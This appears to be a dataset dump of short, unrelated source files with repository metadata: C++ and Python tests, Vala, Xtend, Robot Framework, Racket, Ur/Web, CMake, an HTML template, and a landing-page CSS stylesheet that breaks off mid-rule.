EXPECT_TRUE(b); EXPECT_EQ(ctors, 1); EXPECT_EQ(dtors, 1); } TEST(ThreadLocalTest, TestObjectsAreReleasedByNonstaticThreadLocal) { static std::atomic<int> ctors(0); static std::atomic<int> dtors(0); struct A { A() : i() { ++ctors; } ~A() { ++dtors; } A(const A&) = delete; A& operator=(const A&) = delete; int i; }; std::atomic_bool b(false); std::thread t([&b]() { #if defined(C10_PREFER_CUSTOM_THREAD_LOCAL_STORAGE) ::c10::ThreadLocal<A> a; #else // defined(C10_PREFER_CUSTOM_THREAD_LOCAL_STORAGE) ::c10::ThreadLocal<A> a([]() { static thread_local A var; return &var; }); #endif // defined(C10_PREFER_CUSTOM_THREAD_LOCAL_STORAGE) EXPECT_EQ(a->i, 0); a->i = 1; EXPECT_EQ(a->i, 1); b = true; }); t.join(); EXPECT_TRUE(b); EXPECT_EQ(ctors, 1); EXPECT_EQ(dtors, 1); } } // namespace
C++
4
Hacky-DH/pytorch
c10/test/util/ThreadLocal_test.cpp
[ "Intel" ]
ByJ0
PureBasic
0
pchandrasekaran1595/onnx
onnx/backend/test/data/node/test_sce_mean_3d_log_prob_expanded/test_data_set_0/input_1.pb
[ "Apache-2.0" ]
<p> Welcome back <strong>{{.User.Firstname}}</strong>! </p>
HTML
3
NeatNerdPrime/iris
_examples/mvc/login/web/views/user/me.html
[ "BSD-3-Clause" ]
*** Settings *** Documentation Tests for using ElementTree's default namespace handling Suite Setup Run Tests ${EMPTY} standard_libraries/xml/etree_namespaces.robot Resource xml_resource.robot *** Test Cases *** Tag names contain namespace in Clark Notation Check Test Case ${TESTNAME} Clarck Notation must be used in xpaths Check Test Case ${TESTNAME} xmlns attributes are removed Check Test Case ${TESTNAME} Parsed XML is semantically same as original Check Test Case ${TESTNAME} Prefixes are mangled when XML is saved Check Test Case ${TESTNAME} Attribute namespaces Check Test Case ${TESTNAME}
RobotFramework
4
phil-davis/robotframework
atest/robot/standard_libraries/xml/etree_namespaces.robot
[ "ECL-2.0", "Apache-2.0" ]
int64[] count(int start) { var rounds = new int64[20]; var dp = new int64[2,21,10]; int64[] freqs = {1, 3, 6, 7, 6, 3, 1}; dp[0,0,start] = 1; for (int i = 1; i < 21; i++) { for (int j = 0; j < 21; j++) for (int k = 0; k < 10; k++) dp[i%2,j,k] = 0; for (int j = 0; j < 21; j++) for (int k = 0; k < 10; k++) for (int l = 3; l < 10; l++) { int x = (k + l) % 10; int64 v = dp[(i%2)^1,j,k] * freqs[l-3]; if (j+x+1 >= 21) rounds[i] += v; else dp[i%2,j+x+1,x] += v; } if (i > 3 && rounds[i] == 0) break; } return rounds; } void main() { var xs = stdin.read_line().split(" "); var r0 = count(int.parse(xs[xs.length - 1]) - 1); xs = stdin.read_line().split(" "); var r1 = count(int.parse(xs[xs.length - 1]) - 1); var p0 = new int64[20], p1 = new int64[20]; p0[0] = p1[0] = 1; for (int i = 0; i < 19; i++) { p0[i+1] = (p0[i] - r0[i]) * 27; p1[i+1] = (p1[i] - r1[i]) * 27; } int64[] sums = {0, 0}; for (int i = 1; i < 20; i++) { sums[0] += r0[i] * (p1[i-1]-r1[i-1]); sums[1] += r1[i] * (p0[i]-r0[i]); } stdout.printf("%lld\n", sums[0] > sums[1] ? sums[0] : sums[1]); }
Vala
3
abeaumont/competitive-programming
advent-of-code/2021/day21/part2.vala
[ "WTFPL" ]
/* * Copyright 2014 The Sculptor Project Team, including the original * author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.sculptor.generator.configuration import java.util.MissingResourceException /** * Implementation of {@link ConfigurationProvider} backed by {@link System} properties. */ class SystemPropertiesConfigurationProvider implements ConfigurationProvider { override keys() { System.properties.stringPropertyNames } override has(String key) { System.properties.containsKey(key) } override getString(String key) { val value = System.properties.getProperty(key) if (value === null) { throw new MissingResourceException("Missing string configuration '" + key + "'", "CompositeConfigurationProvider", key) } value } override getBoolean(String key) { val value = System.properties.getProperty(key) if (value === null) { throw new MissingResourceException("Missing boolean configuration '" + key + "'", "CompositeConfigurationProvider", key) } Boolean.parseBoolean(value) } override getInt(String key) { val value = System.properties.getProperty(key) if (value === null) { throw new MissingResourceException("Missing int configuration '" + key + "'", "CompositeConfigurationProvider", key) } Integer.parseInt(value) } }
Xtend
4
sculptor/sculptor
sculptor-generator/sculptor-generator-configuration/src/main/java/org/sculptor/generator/configuration/SystemPropertiesConfigurationProvider.xtend
[ "Apache-2.0" ]
#lang scribble/doc @(require "common.rkt") @title[#:style 'toc]{Interface Reference} @local-table-of-contents[] @include-section["menus.scrbl"] @include-section["prefs.scrbl"] @include-section["keybindings.scrbl"] @include-section["status.scrbl"] @include-section["files.scrbl"]
Racket
3
rrthomas/drracket
drracket/scribblings/drracket/interface-ref.scrbl
[ "Apache-2.0", "MIT" ]
"""Test the Litter-Robot sensor entity.""" from unittest.mock import MagicMock from homeassistant.components.sensor import DOMAIN as PLATFORM_DOMAIN, SensorDeviceClass from homeassistant.const import PERCENTAGE, STATE_UNKNOWN from homeassistant.core import HomeAssistant from .conftest import setup_integration WASTE_DRAWER_ENTITY_ID = "sensor.test_waste_drawer" SLEEP_START_TIME_ENTITY_ID = "sensor.test_sleep_mode_start_time" async def test_waste_drawer_sensor( hass: HomeAssistant, mock_account: MagicMock ) -> None: """Tests the waste drawer sensor entity was set up.""" await setup_integration(hass, mock_account, PLATFORM_DOMAIN) sensor = hass.states.get(WASTE_DRAWER_ENTITY_ID) assert sensor assert sensor.state == "50.0" assert sensor.attributes["unit_of_measurement"] == PERCENTAGE async def test_sleep_time_sensor_with_sleep_disabled( hass: HomeAssistant, mock_account_with_sleep_disabled_robot: MagicMock ) -> None: """Tests the sleep mode start time sensor where sleep mode is disabled.""" await setup_integration( hass, mock_account_with_sleep_disabled_robot, PLATFORM_DOMAIN ) sensor = hass.states.get(SLEEP_START_TIME_ENTITY_ID) assert sensor assert sensor.state == STATE_UNKNOWN assert sensor.attributes["device_class"] == SensorDeviceClass.TIMESTAMP async def test_gauge_icon() -> None: """Test icon generator for gauge sensor.""" from homeassistant.components.litterrobot.sensor import icon_for_gauge_level GAUGE_EMPTY = "mdi:gauge-empty" GAUGE_LOW = "mdi:gauge-low" GAUGE = "mdi:gauge" GAUGE_FULL = "mdi:gauge-full" assert icon_for_gauge_level(None) == GAUGE_EMPTY assert icon_for_gauge_level(0) == GAUGE_EMPTY assert icon_for_gauge_level(5) == GAUGE_LOW assert icon_for_gauge_level(40) == GAUGE assert icon_for_gauge_level(80) == GAUGE_FULL assert icon_for_gauge_level(100) == GAUGE_FULL assert icon_for_gauge_level(None, 10) == GAUGE_EMPTY assert icon_for_gauge_level(0, 10) == GAUGE_EMPTY assert icon_for_gauge_level(5, 10) == GAUGE_EMPTY assert icon_for_gauge_level(40, 10) == GAUGE_LOW assert icon_for_gauge_level(80, 10) == GAUGE assert icon_for_gauge_level(100, 10) == GAUGE_FULL
Python
4
liangleslie/core
tests/components/litterrobot/test_sensor.py
[ "Apache-2.0" ]
table t : { A : option int } fun main () : transaction page = queryX (SELECT COALESCE(t.A, 13) FROM t) (fn r => <xml>{[r.1]},</xml>)
UrWeb
3
apple314159/urweb
tests/coalesce.ur
[ "BSD-3-Clause" ]
set(CMAKE_SYSTEM_PROCESSOR ppc64le) set(GNU_MACHINE "powerpc64le-linux-gnu" CACHE STRING "GNU compiler triple") include("${CMAKE_CURRENT_LIST_DIR}/ppcat.toolchain.cmake")
CMake
3
thisisgopalmandal/opencv
platforms/linux/ppc64le-gnu.toolchain.cmake
[ "BSD-3-Clause" ]
@charset "UTF-8"; html { scroll-behavior: smooth; } body { font-family: 'Sen', sans-serif; font-weight: normal; font-style: normal; color: rgba(0, 0, 0, 0.7); overflow-x: hidden; } * { margin: 0; padding: 0; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } a:focus, input:focus, textarea:focus, button:focus, .btn:focus, .btn.focus, .btn:not(:disabled):not(.disabled).active, .btn:not(:disabled):not(.disabled):active { text-decoration: none; outline: none; -webkit-box-shadow: none; -moz-box-shadow: none; box-shadow: none; } a:hover { color: #37c2cc; } a { -webkit-transition: all 0.3s ease-out 0s; -moz-transition: all 0.3s ease-out 0s; -ms-transition: all 0.3s ease-out 0s; -o-transition: all 0.3s ease-out 0s; transition: all 0.3s ease-out 0s; } a, a:focus, a:hover { text-decoration: none; } i, span, a { display: inline-block; } audio, canvas, iframe, img, svg, video { vertical-align: middle; } h1, h2, h3, .single-post-header, .blog-roll-card-header, h4, h5, h6 { font-weight: 700; margin: 0px; } h1 a, h2 a, h3 a, .single-post-header a, .blog-roll-card-header a, h4 a, h5 a, h6 a { color: inherit; } h1 { font-size: 55px; } h2 { font-size: 45px; } @media only screen and (min-width: 992px) and (max-width: 1199px) { .section-title h2 { font-size: 38px; } } @media (max-width: 767px) { .section-title h2 { font-size: 38px; } } h3, .single-post-header, .blog-roll-card-header { font-size: 25px; } h4 { font-size: 20px; } h5 { font-size: 18px; } h6 { font-size: 16px; } ul, ol { margin: 0px; padding: 0px; list-style-type: none; } p { font-size: 16px; font-weight: 400; line-height: 25px; margin: 0px; } .img-bg { background-position: center center; background-size: cover; background-repeat: no-repeat; width: 100%; height: 100%; } .gray-bg-1 { background-color: #fafafa; } .gray-bg-2 { background-color: #f2f2f2; } .error { color: orangered; } .success { color: green; } @media (max-width: 767px) { .container { padding: 0 30px; } } /*===== All Button Style =====*/ .main-btn { display: inline-block; font-weight: 400; text-align: center; white-space: nowrap; vertical-align: middle; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; padding: 18px 28px; font-size: 18px; line-height: 1; border-radius: 10px; color: #fff; cursor: pointer; z-index: 5; transition: all 0.4s ease-in-out; border: 2px solid transparent; background: #37c2cc; overflow: hidden; } .main-btn:hover { color: #fff; } .main-btn.border-btn { border: 2px solid #37c2cc; background: transparent; color: #37c2cc; } .main-btn.border-btn:hover::after { background-color: rgba(55, 194, 204, 0.15); } .btn-hover { position: relative; overflow: hidden; } .btn-hover::after { content: ''; position: absolute; width: 0%; height: 0%; border-radius: 50%; background: rgba(0, 0, 0, 0.05); top: 50%; left: 50%; padding: 50%; z-index: -1; -webkit-transition: all 0.3s ease-out 0s; -moz-transition: all 0.3s ease-out 0s; -ms-transition: all 0.3s ease-out 0s; -o-transition: all 0.3s ease-out 0s; transition: all 0.3s ease-out 0s; -webkit-transform: translate3d(-50%, -50%, 0) scale(0); -moz-transform: translate3d(-50%, -50%, 0) scale(0); -ms-transform: translate3d(-50%, -50%, 0) scale(0); -o-transform: translate3d(-50%, -50%, 0) scale(0); transform: translate3d(-50%, -50%, 0) scale(0); } .btn-hover:hover::after { -webkit-transform: translate3d(-50%, -50%, 0) scale(1.3); -moz-transform: translate3d(-50%, -50%, 0) scale(1.3); -ms-transform: translate3d(-50%, -50%, 0) scale(1.3); -o-transform: translate3d(-50%, -50%, 0) scale(1.3); transform: translate3d(-50%, -50%, 0) scale(1.3); } .scroll-top { width: 45px; height: 45px; background: #37c2cc; display: flex; justify-content: center; align-items: center; font-size: 18px; color: #fff; border-radius: 5px; position: fixed; bottom: 30px; right: 30px; z-index: 9; cursor: pointer; -webkit-transition: all 0.3s ease-out 0s; -moz-transition: all 0.3s ease-out 0s; -ms-transition: all 0.3s ease-out 0s; -o-transition: all 0.3s ease-out 0s; transition: all 0.3s ease-out 0s; } .scroll-top:hover { color: #fff; background: rgba(55, 194, 204, 0.8); } @keyframes animation1 { 0% { -webkit-transform: translateY(30px); -moz-transform: translateY(30px); -ms-transform: translateY(30px); -o-transform: translateY(30px); transform: translateY(30px); } 50% { -webkit-transform: translateY(-30px); -moz-transform: translateY(-30px); -ms-transform: translateY(-30px); -o-transform: translateY(-30px); transform: translateY(-30px); } 100% { -webkit-transform: translateY(30px); -moz-transform: translateY(30px); -ms-transform: translateY(30px); -o-transform: translateY(30px); transform: translateY(30px); } } @-webkit-keyframes animation1 { 0% { -webkit-transform: translateY(30px); -moz-transform: translateY(30px); -ms-transform: translateY(30px); -o-transform: translateY(30px); transform: translateY(30px); } 50% { -webkit-transform: translateY(-30px); -moz-transform: translateY(-30px); -ms-transform: translateY(-30px); -o-transform: translateY(-30px); transform: translateY(-30px); } 100% { -webkit-transform: translateY(30px); -moz-transform: translateY(30px); -ms-transform: translateY(30px); -o-transform: translateY(30px); transform: translateY(30px); } } /*===== All Preloader Style =====*/ .preloader { /* Body Overlay */ position: fixed; top: 0; left: 0; display: table; height: 100%; width: 100%; /* Change Background Color */ background: #fff; z-index: 99999; } .preloader .loader { display: table-cell; vertical-align: middle; text-align: center; } .preloader .loader .spinner { position: absolute; left: 50%; top: 50%; width: 64px; margin-left: -32px; z-index: 18; pointer-events: none; } .preloader .loader .spinner .spinner-container { pointer-events: none; position: absolute; width: 100%; padding-bottom: 100%; top: 50%; left: 50%; margin-top: -50%; margin-left: -50%; -webkit-animation: spinner-linspin 1568.23529647ms linear infinite; -moz-animation: spinner-linspin 1568.23529647ms linear infinite; -o-animation: spinner-linspin 1568.23529647ms linear infinite; animation: spinner-linspin 1568.23529647ms linear infinite; } .preloader .loader .spinner .spinner-container .spinner-rotator { position: absolute; width: 100%; height: 100%; -webkit-animation: spinner-easespin 5332ms cubic-bezier(0.4, 0, 0.2, 1) infinite both; -moz-animation: spinner-easespin 5332ms cubic-bezier(0.4, 0, 0.2, 1) infinite both; -o-animation: spinner-easespin 5332ms cubic-bezier(0.4, 0, 0.2, 1) infinite both; animation: spinner-easespin 5332ms cubic-bezier(0.4, 0, 0.2, 1) infinite both; } .preloader .loader .spinner .spinner-container .spinner-rotator .spinner-left { position: absolute; top: 0; left: 0; bottom: 0; overflow: hidden; right: 50%; } .preloader .loader .spinner .spinner-container .spinner-rotator .spinner-right { position: absolute; top: 0; right: 0; bottom: 0; overflow: hidden; left: 50%; } .preloader .loader .spinner-circle { box-sizing: border-box; position: absolute; width: 200%; height: 100%; border-style: solid; /* Spinner Color */ border-color: #37c2cc #37c2cc rgba(0, 0, 0, 0.1); border-radius: 50%; border-width: 6px; } .preloader .loader .spinner-left .spinner-circle { left: 0; right: -100%; border-right-color: rgba(0, 0, 0, 0.1); -webkit-animation: spinner-left-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both; -moz-animation: spinner-left-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both; -o-animation: spinner-left-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both; animation: spinner-left-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both; } .preloader .loader .spinner-right .spinner-circle { left: -100%; right: 0; border-left-color: rgba(0, 0, 0, 0.1); -webkit-animation: right-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both; -moz-animation: right-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both; -o-animation: right-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both; animation: right-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both; } /* Preloader Animations */ @-webkit-keyframes spinner-linspin { to { -webkit-transform: rotate(360deg); -moz-transform: rotate(360deg); -ms-transform: rotate(360deg); -o-transform: rotate(360deg); transform: rotate(360deg); } } @keyframes spinner-linspin { to { -webkit-transform: rotate(360deg); -moz-transform: rotate(360deg); -ms-transform: rotate(360deg); -o-transform: rotate(360deg); transform: rotate(360deg); } } @-webkit-keyframes spinner-easespin { 12.5% { -webkit-transform: rotate(135deg); -moz-transform: rotate(135deg); -ms-transform: rotate(135deg); -o-transform: rotate(135deg); transform: rotate(135deg); } 25% { -webkit-transform: rotate(270deg); -moz-transform: rotate(270deg); -ms-transform: rotate(270deg); -o-transform: rotate(270deg); transform: rotate(270deg); } 37.5% { -webkit-transform: rotate(405deg); -moz-transform: rotate(405deg); -ms-transform: rotate(405deg); -o-transform: rotate(405deg); transform: rotate(405deg); } 50% { -webkit-transform: rotate(540deg); -moz-transform: rotate(540deg); -ms-transform: rotate(540deg); -o-transform: rotate(540deg); transform: rotate(540deg); } 62.5% { -webkit-transform: rotate(675deg); -moz-transform: rotate(675deg); -ms-transform: rotate(675deg); -o-transform: rotate(675deg); transform: rotate(675deg); } 75% { -webkit-transform: rotate(810deg); -moz-transform: rotate(810deg); -ms-transform: rotate(810deg); -o-transform: rotate(810deg); transform: rotate(810deg); } 87.5% { -webkit-transform: rotate(945deg); -moz-transform: rotate(945deg); -ms-transform: rotate(945deg); -o-transform: rotate(945deg); transform: rotate(945deg); } to { -webkit-transform: rotate(1080deg); -moz-transform: rotate(1080deg); -ms-transform: rotate(1080deg); -o-transform: rotate(1080deg); transform: rotate(1080deg); } } @keyframes spinner-easespin { 12.5% { -webkit-transform: rotate(135deg); -moz-transform: rotate(135deg); -ms-transform: rotate(135deg); -o-transform: rotate(135deg); transform: rotate(135deg); } 25% { -webkit-transform: rotate(270deg); -moz-transform: rotate(270deg); -ms-transform: rotate(270deg); -o-transform: rotate(270deg); transform: rotate(270deg); } 37.5% { -webkit-transform: rotate(405deg); -moz-transform: rotate(405deg); -ms-transform: rotate(405deg); -o-transform: rotate(405deg); transform: rotate(405deg); } 50% { -webkit-transform: rotate(540deg); -moz-transform: rotate(540deg); -ms-transform: rotate(540deg); -o-transform: rotate(540deg); transform: rotate(540deg); } 62.5% { -webkit-transform: rotate(675deg); -moz-transform: rotate(675deg); -ms-transform: rotate(675deg); -o-transform: rotate(675deg); transform: rotate(675deg); } 75% { -webkit-transform: rotate(810deg); -moz-transform: rotate(810deg); -ms-transform: rotate(810deg); -o-transform: rotate(810deg); transform: rotate(810deg); } 87.5% { -webkit-transform: rotate(945deg); -moz-transform: rotate(945deg); -ms-transform: rotate(945deg); -o-transform: rotate(945deg); transform: rotate(945deg); } to { -webkit-transform: rotate(1080deg); -moz-transform: rotate(1080deg); -ms-transform: rotate(1080deg); -o-transform: rotate(1080deg); transform: rotate(1080deg); } } @-webkit-keyframes spinner-left-spin { 0% { -webkit-transform: rotate(130deg); -moz-transform: rotate(130deg); -ms-transform: rotate(130deg); -o-transform: rotate(130deg); transform: rotate(130deg); } 50% { -webkit-transform: rotate(-5deg); -moz-transform: rotate(-5deg); -ms-transform: rotate(-5deg); -o-transform: rotate(-5deg); transform: rotate(-5deg); } to { -webkit-transform: rotate(130deg); -moz-transform: rotate(130deg); -ms-transform: rotate(130deg); -o-transform: rotate(130deg); transform: rotate(130deg); } } @keyframes spinner-left-spin { 0% { -webkit-transform: rotate(130deg); -moz-transform: rotate(130deg); -ms-transform: rotate(130deg); -o-transform: rotate(130deg); transform: rotate(130deg); } 50% { -webkit-transform: rotate(-5deg); -moz-transform: rotate(-5deg); -ms-transform: rotate(-5deg); -o-transform: rotate(-5deg); transform: rotate(-5deg); } to { -webkit-transform: rotate(130deg); -moz-transform: rotate(130deg); -ms-transform: rotate(130deg); -o-transform: rotate(130deg); transform: rotate(130deg); } } @-webkit-keyframes right-spin { 0% { -webkit-transform: rotate(-130deg); -moz-transform: rotate(-130deg); -ms-transform: rotate(-130deg); -o-transform: rotate(-130deg); transform: rotate(-130deg); } 50% { -webkit-transform: rotate(5deg); -moz-transform: rotate(5deg); -ms-transform: rotate(5deg); -o-transform: rotate(5deg); transform: rotate(5deg); } to { -webkit-transform: rotate(-130deg); -moz-transform: rotate(-130deg); -ms-transform: rotate(-130deg); -o-transform: rotate(-130deg); transform: rotate(-130deg); } } @keyframes right-spin { 0% { -webkit-transform: rotate(-130deg); -moz-transform: rotate(-130deg); -ms-transform: rotate(-130deg); -o-transform: rotate(-130deg); transform: rotate(-130deg); } 50% { -webkit-transform: rotate(5deg); -moz-transform: rotate(5deg); -ms-transform: rotate(5deg); -o-transform: rotate(5deg); transform: rotate(5deg); } to { -webkit-transform: rotate(-130deg); -moz-transform: rotate(-130deg); -ms-transform: rotate(-130deg); -o-transform: rotate(-130deg); transform: rotate(-130deg); } } /*=========================== NAVBAR CSS ============================= */ .navbar-area { position: absolute; top: 0; left: 0; width: 100%; z-index: 99; -webkit-transition: all 0.3s ease-out 0s; -moz-transition: all 0.3s ease-out 0s; -ms-transition: all 0.3s ease-out 0s; -o-transition: all 0.3s ease-out 0s; transition: all 0.3s ease-out 0s; } .sticky { position: fixed; z-index: 99; background-color: #fff; -webkit-box-shadow: 0px 20px 50px 0px rgba(0, 0, 0, 0.05); -moz-box-shadow: 0px 20px 50px 0px rgba(0, 0, 0, 0.05); box-shadow: 0px 20px 50px 0px rgba(0, 0, 0, 0.05); -webkit-transition: all 0.3s ease-out 0s; -moz-transition: all 0.3s ease-out 0s; -ms-transition: all 0.3s ease-out 0s; -o-transition: all 0.3s ease-out 0s; transition: all 0.3s ease-out 0s; } .sticky .navbar .navbar-nav .nav-item a { color: rgba(0, 0, 0, 0.9); } .sticky .navbar .navbar-nav .nav-item a.active, .sticky .navbar .navbar-nav .nav-item a:hover { color: #37c2cc; } .sticky .navbar .navbar-nav .nav-item a.active::before, .sticky .navbar .navbar-nav .nav-item a:hover::before { background: #37c2cc; } .sticky .navbar .header-btn .main-btn { color: #fff; } .sticky .navbar .navbar-toggler .toggler-icon { background: rgba(0, 0, 0, 0.9); } .navbar { border-radius: 5px; position: relative; -webkit-transition: all 0.3s ease-out 0s; -moz-transition: all 0.3s ease-out 0s; -ms-transition: all 0.3s ease-out 0s; -o-transition: all 0.3s ease-out 0s; transition: all 0.3s ease-out 0s; padding: 10px 0; } @media only screen and (min-width: 768px) and (max-width: 991px), (max-width: 767px) { .navbar { padding: 15px 0; } } .navbar-brand { padding: 0; display: flex; } .navbar-brand img { max-width: 180px; } .navbar-toggler { padding: 0; } @media only screen and (min-width: 768px) and (max-width: 991px), (max-width: 767px) { .navbar-toggler { position: absolute; right: 0; top: 22px; } } .navbar-toggler:focus { outline: none; -webkit-box-shadow: none; -moz-box-shadow: none; box-shadow: none; } .navbar-toggler .toggler-icon { width: 30px; height: 2px; background-color: rgba(0, 0, 0, 0.9); display: block; margin: 5px 0; position: relative; -webkit-transition: all 0.3s ease-out 0s; -moz-transition: all 0.3s ease-out 0s; -ms-transition: all 0.3s ease-out 0s; -o-transition: all 0.3s ease-out 0s; transition: all 0.3s ease-out 0s; } .navbar-toggler.active .toggler-icon:nth-of-type(1) { -webkit-transform: rotate(45deg); -moz-transform: rotate(45deg); -ms-transform: rotate(45deg); -o-transform: rotate(45deg); transform: rotate(45deg); top: 7px; } .navbar-toggler.active .toggler-icon:nth-of-type(2) { opacity: 0; } .navbar-toggler.active .toggler-icon:nth-of-type(3) { -webkit-transform: rotate(135deg); -moz-transform: rotate(135deg); -ms-transform: rotate(135deg); -o-transform: rotate(135deg); transform: rotate(135deg); top: -7px; } @media only screen and (min-width: 768px) and (max-width: 991px), (max-width: 767px) { .navbar-collapse { position: absolute; top: 100%; left: 0; width: 100%; background-color: #fff; z-index: 9; -webkit-box-shadow: 0px 15px 20px 0px rgba(0, 0, 0, 0.1); -moz-box-shadow: 0px 15px 20px 0px rgba(0, 0, 0, 0.1); box-shadow: 0px 15px 20px 0px rgba(0, 0, 0, 0.1); padding: 5px 12px; } } .navbar-nav .nav-item { position: relative; padding: 8px 0; } @media only screen and (min-width: 768px) and (max-width: 991px), (max-width: 767px) { .navbar-nav .nav-item { padding: 0px; margin-left: 20px; } } @media (max-width: 767px) { .navbar-nav .nav-item:first-child { margin-top: 20px; } } @media only screen and (min-width: 768px) and (max-width: 991px), (max-width: 767px) { .navbar-nav .nav-item:last-child { margin-bottom: 20px; } } .navbar-nav .nav-item a { color: rgba(0, 0, 0, 0.9); -webkit-transition: all 0.3s ease-out 0s; -moz-transition: all 0.3s ease-out 0s; -ms-transition: all 0.3s ease-out 0s; -o-transition: all 0.3s ease-out 0s; transition: all 0.3s ease-out 0s; padding: 8px 17px; position: relative; font-weight: 500; font-size: 18px; text-align: center; } @media only screen and (min-width: 768px) and (max-width: 991px), (max-width: 767px) { .navbar-nav .nav-item a { display: inline-block; padding: 6px 0px; color: rgba(0, 0, 0, 0.9); } } .navbar-nav .nav-item a:hover, .navbar-nav .nav-item a.active { color: #37c2cc; } @media (max-width: 767px) { .header-btn { display: none; } } @media only screen and (min-width: 550px) and (max-width: 767px) { .header-btn { display: flex; } } .header-btn .main-btn { color: #fff; background: #37c2cc; padding: 12px 22px; margin-left: 15px; } @media only screen and (min-width: 768px) and (max-width: 991px), (max-width: 767px) { .header-btn .main-btn { padding: 8px 20px; margin-right: 60px; margin-left: 0px; } } /* ==================== HERO CSS ======================= */ .hero-section { position: relative; overflow: hidden; height: 780px; display: flex; align-items: center; background: linear-gradient( 180deg, #c2fbff 0%, rgba(255, 255, 255, 0) 93.47% ); z-index: 1; } @media only screen and (min-width: 1200px) and (max-width: 1399px) { .hero-section { height: 650px; } } @media only screen and (min-width: 992px) and (max-width: 1199px) { .hero-section { height: 640px; } } @media only screen and (min-width: 768px) and (max-width: 991px), (max-width: 767px) { .hero-section { height: auto; padding: 100px 0; } } .hero-section::after { content: ''; position: absolute; width: 862px; height: 862px; border-radius: 50%; right: -150px; top: -150px; background: #99ecf2; z-index: -1; } @media only screen and (min-width: 1200px) and (max-width: 1399px) { .hero-section::after { width: 780px; height: 780px; } } @media only screen and (min-width: 992px) and (max-width: 1199px) { .hero-section::after { width: 750px; height: 750px; } } @media only screen and (min-width: 768px) and (max-width: 991px), (max-width: 767px) { .hero-section::after { display: none; } } @media only screen and (min-width: 768px) and (max-width: 991px) { .hero-section .hero-content { padding-top: 50px; } } .hero-section .hero-content h1 { margin-bottom: 15px; } @media only screen and (min-width: 992px) and (max-width: 1199px) { .hero-section .hero-content h1 { font-size: 50px; } } @media (max-width: 767px) { .hero-section .hero-content h1 { font-size: 45px; } } .hero-section .hero-content p { margin-bottom: 30px; color: rgba(0, 0, 0, 0.6); font-size: 18px; } @media only screen and (min-width: 1400px), only screen and (min-width: 1200px) and (max-width: 1399px) { .hero-section .hero-content p { padding-right: 115px; } } .hero-section .hero-image { padding-top: 50px; } @media only screen and (min-width: 992px) and (max-width: 1199px), only screen and (min-width: 1200px) and (max-width: 1399px) { .hero-section .hero-image img { width: 100%; } } @media only screen and (min-width: 768px) and (max-width: 991px), (max-width: 767px) { .hero-section .hero-image img { max-width: 100%; margin: auto; } } /* =============================== FEATURE SECTION ONE CSS ================================== */ .feature-section { position: relative; background-image: url('../public/images/common-bg.svg'); background-size: cover; background-position: bottom center; padding-top: 180px; padding-bottom: 55px; } .single-feature { margin-bottom: 65px; } @media only screen and (min-width: 1400px) { .single-feature { padding-right: 65px; } } .single-feature:hover .feature-icon::before { background: #37c2cc; } .single-feature:hover .feature-icon i { color: #fff; } .single-feature .feature-icon { width: 62px; height: 66px; position: relative; z-index: 3; display: flex; align-items: center; justify-content: center; margin-bottom: 40px; } .single-feature .feature-icon img { width: 100%; height: auto; } .single-feature .feature-icon::before, .single-feature .feature-icon::after { content: ''; position: absolute; width: 100%; height: 100%; border-radius: 8px; -webkit-transform: skew(-3deg); -moz-transform: skew(-3deg); -ms-transform: skew(-3deg); -o-transform: skew(-3deg); transform: skew(-3deg); } .single-feature .feature-icon::before { background: #d5f1f3; -webkit-transition: all 0.3s ease-out 0s; -moz-transition: all 0.3s ease-out 0s; -ms-transition: all 0.3s ease-out 0s; -o-transition: all 0.3s ease-out 0s; transition: all 0.3s ease-out 0s; z-index: -1; } .single-feature .feature-icon::after { background: transparent; border: 2px solid #d5f1f3; top: 8px; left: -8px; z-index: -2; } .single-feature .feature-icon i { font-size: 40px; color: black; -webkit-transition: all 0.3s ease-out 0s; -moz-transition: all 0.3s ease-out 0s; -ms-transition: all 0.3s ease-out 0s; -o-transition: all 0.3s ease-out 0s; transition: all 0.3s ease-out 0s; } .single-feature .feature-content h4 { margin-bottom: 15px; } /* ======================== CTA SECTION CSS =========================== */ .cta-section { position: relative; z-index: 1; padding-top: 220px; } @media only screen and (min-width: 1200px) and (max-width: 1399px) { .cta-section { padding-top: 150px; } } @media only screen and (min-width: 992px) and (max-width: 1199px) { .cta-section { padding-top: 130px; } } @media only screen and (min-width: 768px) and (max-width: 991px), (max-width: 767px) { .cta-section { padding-top: 0px; } } .cta-section .left-image { left: 0px; bottom: 0; } @media only screen and (min-width: 768px) and (max-width: 991px), (max-width: 767px) { .cta-section .left-image { position: static; width: 100%; margin-top: 50px; } } .cta-section .left-image img { max-width: 100%; } @media only screen and (min-width: 768px) and (max-width: 991px), (max-width: 767px) { .cta-section .left-image img { max-width: 100%; margin: auto; } } @media only screen and (min-width: 1400px) { .cta-section .cta-content-wrapper { padding-right: 100px; } } @media only screen and (min-width: 768px) and (max-width: 991px), (max-width: 767px) { .cta-section .cta-image { margin-top: 50px; } } .cta-section .cta-image img { width: 100%; } /* ===================== BLOG CSS ======================== */ .blog-section { padding-top: 160px; background-image: url('../public/images/common-bg.svg'); background-size: cover; background-position: bottom-center; } .blog-section .section-title { margin-bottom: 60px; } @media only screen and (min-width: 1400px), only screen and (min-width: 1200px) and (max-width: 1399px) { .blog-section .section-title { padding: 0px 40px; } } .blog-section .section-title h2 { margin-bottom: 15px; } .single-blog, .single-post, .blog-roll-card { background: #fff; box-shadow: 0px 0px 50px rgba(183, 199, 240, 0.25); border-radius: 14px; padding: 52px 30px; margin-bottom: 50px; position: relative; overflow: hidden; z-index: 1; } .single-blog .populer, .single-post .populer, .blog-roll-card .populer { position: absolute; right: 10px; top: 18px; color: #fff; z-index: 2; font-size: 16px; font-weight: 700; } .single-blog .blog-header, .single-post 